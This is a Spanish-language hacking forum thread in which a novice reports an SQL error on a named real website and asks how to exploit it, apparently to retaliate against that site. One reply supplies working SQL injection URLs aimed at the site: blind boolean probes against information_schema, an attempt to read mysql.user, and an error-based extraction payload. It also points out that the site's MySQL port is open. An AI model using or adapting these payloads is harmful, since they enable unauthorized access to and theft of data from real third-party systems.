elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:44  


Tema destacado: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  He encontrado un bug, pero como explotarlo?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: He encontrado un bug, pero como explotarlo?  (Leído 2,030 veces)
groted

Desconectado Desconectado

Mensajes: 1


Ver Perfil
He encontrado un bug, pero como explotarlo?
« en: 18 Julio 2011, 05:29 »

Bueno soy muy novato etc etc....Y encontre un bug en una web que no para de atacarme.... es este:

Error en la consulta de conteo de registros: SELECT COUNT(*) FROM c_comunidades as co inner join c_categorias as ca ON ca.id_categoria=co.categoria WHERE (nombre LIKE '%'%' or descripcion LIKE '%'%') and eliminado='0' and categoria=' ' ORDER BY fecha desc, idco DESC . Mysql dijo: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or descripcion LIKE '%'%') and eliminado='0' and categoria=' ' ORDER BY fecha' at line 1

BUeno la web es www.onlypost.netel bug esta aqui http://comunidad.onlypost.net/comunidades/buscador-comunidades.php?q='

Lo consegui poniendo un ' en el buscador pero claro...... Ni idea de como explotarlo xd
Espero que me podais guiar.....
En línea
.:UND3R:.


Desconectado Desconectado

Mensajes: 1.960


Ingeniería inversa


Ver Perfil WWW
Re: He encontrado un bug, pero como explotarlo?
« Respuesta #1 en: 19 Julio 2011, 07:22 »

Borra eso por favor, creo que es una injecciòn SQL
En línea

Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: He encontrado un bug, pero como explotarlo?
« Respuesta #2 en: 19 Julio 2011, 08:54 »

1. No DESCUBRISTE, estás usando un vulnerabilidad que es iSQL -ya existía hace mucho tiempo-.
2. Interfieres con la ejecución de la Query pero no puedes inyectar.
3. Quizás sea una blind.
En línea

---
Space.Medafighter.X

Desconectado Desconectado

Mensajes: 24



Ver Perfil
Re: He encontrado un bug, pero como explotarlo?
« Respuesta #3 en: 19 Julio 2011, 10:31 »

Segúramente se refiere a que encontró un bug en el sitio web y por el contexto se asume que no "descubrió" el método, aunque igualmente considero absurdo discutir quién utilizó por primera vez un método tan elemental basado en el principio de inyección de código.

Fácilmente se puede explotar con substring, length, etc si lo que se pretende es leer datos específicos. La versión "5.0.92-community" tiene information_schema.tables.

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/information_schema.tables/**/WHERE/**/substring(table_name,1,10)='collations'/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

Da pereza extraer datos mediante blind por lo que también puedes generar mensajes de error -lástima que no puedas leer mysql.user y mucho menos en esta versión de MySQL- :

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/mysql.user/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

Citar
SELECT command denied to user 'tumusica_new'@'localhost' for table 'user'

O conectarte al puerto de MySQL (el servidor lo tiene abierto) :

Citar
comunidad.onlypost.net [190.210.100.80] 3306 (?) open
>
5.0.92-community K÷é ^?]8?rD9 ,☻              207bheDa;D%'

O incluso generar mensajes de error para extraer datos : http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND(SELECT/**/1/**/FROM(SELECT/**/count(*),concat((SELECT/**/(SELECT/**/(SELECT/**/distinct/**/concat(0x7e,0x27,unhex(Hex(cast(table_name/**/AS/**/char))),0x27,0x7e)/**/FROM/**/information_schema.tables/**/LIMIT/**/1,1))/**/FROM/**/information_schema.tables/**/LIMIT/**/0,1),floor(rand(0)*2))x/**/FROM/**/information_schema.tables/**/group/**/by/**/x)a)/**/AND/**/'1'='1&tipo_buscador2=temas&cat=-1
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
RPC en red interna, como explotarlo desde el exterior ???
Bugs y Exploits
ksys 7 1,534 Último mensaje 7 Junio 2004, 20:22
por ksys
[Mod] Puerto 10000 en un Debian? Como explotarlo?
Hacking Linux/Unix
IMPERIAL 8 4,076 Último mensaje 3 Febrero 2005, 08:05
por IMPERIAL
Encontre bug pero nose explotarlo!!!
Bugs y Exploits
ch3k0 5 1,385 Último mensaje 24 Abril 2005, 20:25
por mousehack
problema encontrado pero no solucionado.
Programación Visual Basic
erick185 2 333 Último mensaje 15 Marzo 2006, 15:39
por Kizar
XSS encontrado pero me falta una ruta :s
Hacking Básico
Debci 13 1,828 Último mensaje 29 Septiembre 2009, 21:23
por Debci
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines